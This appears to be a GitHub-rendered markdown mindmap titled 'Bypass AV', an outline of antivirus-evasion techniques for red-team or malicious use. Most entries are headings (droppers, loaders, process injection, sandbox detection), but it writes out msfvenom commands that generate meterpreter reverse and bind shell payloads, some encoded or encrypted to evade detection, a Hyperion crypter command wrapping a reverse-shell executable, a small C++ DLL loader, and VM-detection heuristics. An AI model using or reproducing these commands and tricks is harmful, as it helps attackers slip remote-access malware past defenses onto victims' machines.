Skip to content

Latest commit

 

History

History
364 lines (263 loc) · 10.6 KB

Bypass-AV.md

File metadata and controls

364 lines (263 loc) · 10.6 KB
markmap
colorFreezeLevel initialExpandLevel
3
2

Bypass AV

Manual dropper

C++

Automatic dropper

Manual loader

Reminder

  1. allocating memory
  2. moving shellcode into that memory
  3. executing the shellcode

Go

C

  • #include <iostream>
    #include <Windows.h>
    
    int main(void) {
      HMODULE hMod = LoadLibrary("shellcode.dll");
      if (hMod == nullptr) {
        cout << "Failed to load shellcode.dll" << endl;
      }
    
      return 0;
    }

C++

.NET

Ruby

Automatic loader

C++/C#

C

Nim

Go

Rust

Crystal

Generate shellcode

msfvenom

  • msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<SERVER> LPORT=<PORT> -f raw
  • msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 --encrypt rc4 --encrypt-key thisisakey -f dll
  • msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai '\x00' -i 30 RHOST=10.0.0.68 LPORT=9050 -f c | tr -d '"' | tr -d '\n' | more

C2 (Cobalt/Havoc what ever)

ASM

Hyperion

  • wine hyperion.exe /root/payloads/shellter/shellter_putty_reverse_x86.exe

Manual obfuscation

Static

dynamic

Automatic obfuscation

Static

Dynamic

Process injection

CRT

APC (Asyncronous Procedure Call)

Process hollowing

Thread execution hijacking

PSC (Ptrace System Calls)

Process Doppelganging

Dll injection

https://www.ired.team/offensive-security/code-injection-process-injection/dll-injection

RWX

  • You put your region in RW, you write your shellcode, then you reprotect in RX, then you run the thread. This way your region is never in rwx

COM Hijack

Remote thread

User APC

Detect virtual machines (Sandbox)

Software

  • Count processus number
    • if >=40 its probably not a VM
  • User interaction
    • Send MessageBoxW
  • Check for internet
  • Datetime on compilation
  • Check for Computer name
    • VM = DESKTOP-[0-9A-Z]{7}

Hardware

OSX

Tools

From PE to shellcode

From .exe (build with .net) to .exe hidden

From alive beacon

Havoc

  • dotnet (object file)

Cobalt

Extensions

Dll

Exe

Hta

Cpl

Link

Crédits

Pro tips : A shellcode going through 3 open-source packers will have more chance to get detected than a manual obfuscation